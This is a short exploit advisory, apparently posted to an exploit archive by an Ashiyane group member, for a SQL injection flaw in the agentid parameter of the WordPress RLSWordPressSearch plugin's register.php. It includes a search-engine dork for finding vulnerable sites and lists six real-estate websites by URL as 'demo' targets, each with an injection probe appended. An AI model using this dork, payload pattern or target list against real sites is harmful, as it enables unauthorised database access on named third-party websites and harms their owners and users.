The WordPress RLSWordPressSearch plugin suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
b26265f8773c88bd11c805605ff88de7f20c168b9649111452af6b633c767de8
##############
# Exploit Title : Wordpress RLSWordPressSearch plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : ww.ashiyane.org
#
# Security Risk : MEdium - SQL Injection
#
# Dork : inurl:wp-content/plugins/RLSWordPressSearch/register.php?a=
#
##############
#Location:site/wp-content/plugins/RLSWordPressSearch/register.php?a=[num]&agentid=[SQL]
#
#
#DEm0:
# www.donahuere.com/DedhamrealEstate411/wp-content/plugins/RLSWordPressSearch/register.php?a=104267&agentid=117699%27
#
# www.cbupton-massamont.com/blog/wp-content/plugins/RLSWordPressSearch/register.php?a=105123&agentid=105458%27
#
# www.melantoniore.com/blog/wp-content/plugins/RLSWordPressSearch/register.php?a=117650&agentid=406671%27
#
# www.selectrealestate.com/blog/wp-content/plugins/RLSWordPressSearch/register.php?agentid=A210506%27
#
# blog.century21denault.com/wp-content/plugins/RLSWordPressSearch/register.php?a=104286&agentid=104361%27
#
# www.exitpremier.com/blog/wp-content/plugins/RLSWordPressSearch/register.php?a=104563&agentid=104564%27
#
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############